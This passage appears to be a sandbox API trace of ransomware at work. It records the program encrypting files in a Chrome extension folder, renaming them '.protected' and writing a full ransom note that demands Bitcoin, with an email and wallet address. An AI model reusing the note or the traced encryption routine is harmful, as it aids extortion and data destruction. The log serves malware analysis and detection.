lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.746] CloseHandle (hObject=0x164) returned 1 [0083.746] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.746] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0083.746] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0083.746] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0083.746] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0083.746] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0083.746] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja") returned 150 [0083.746] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0083.746] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0083.746] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\*") returned 152 [0083.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.747] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.747] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.747] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.747] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.747] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\.") returned 152 [0083.747] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.747] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.747] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.747] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.747] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.747] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.747] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\..") returned 153 [0083.747] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.747] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.747] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.747] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.747] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.747] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.747] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.747] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json") returned 164 [0083.747] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.749] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.749] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.749] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json") returned 164 [0083.750] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json") returned 164 [0083.750] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json") returned 164 [0083.750] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.750] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.769] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.769] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.769] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.769] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.774] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.774] CloseHandle (hObject=0x168) returned 1 [0083.774] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.protected") returned 174 [0083.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.protected")) returned 1 [0083.774] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.775] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.775] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\RESTORE_FILES.txt") returned 168 [0083.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.775] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.775] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.776] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.776] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.776] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.776] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.776] CloseHandle (hObject=0x164) returned 1 [0083.776] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.776] lstrcmpiW (lpString1="kn", lpString2="Windows") returned -1 [0083.776] lstrcmpiW (lpString1="kn", lpString2="Program Files") returned -1 [0083.776] lstrcmpiW (lpString1="kn", lpString2="Program Files (x86)") returned -1 [0083.776] lstrcmpiW (lpString1="kn", lpString2="$Recycle.bin") returned 1 [0083.776] lstrcmpiW (lpString1="kn", lpString2="System Volume Information") returned -1 [0083.776] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn") returned 150 [0083.776] lstrcmpW (lpString1="kn", lpString2=".") returned 1 [0083.776] lstrcmpW (lpString1="kn", lpString2="..") returned 1 [0083.776] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\*") returned 152 [0083.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.777] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.777] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.777] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.777] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.777] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\.") returned 152 [0083.777] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.777] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.777] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.777] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.777] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.777] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.777] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\..") returned 153 [0083.777] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.777] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.777] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.777] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.777] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.777] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.777] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.777] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json") returned 164 [0083.777] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.777] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.777] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.777] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.803] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json") returned 164 [0083.803] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.803] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json") returned 164 [0083.803] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.803] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json") returned 164 [0083.803] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.803] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.804] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.804] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.804] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.805] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.805] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.805] CloseHandle (hObject=0x168) returned 1 [0083.806] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.protected") returned 174 [0083.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.protected")) returned 1 [0083.807] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.807] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.807] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\RESTORE_FILES.txt") returned 168 [0083.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.807] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.808] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.808] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.808] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.808] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.808] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 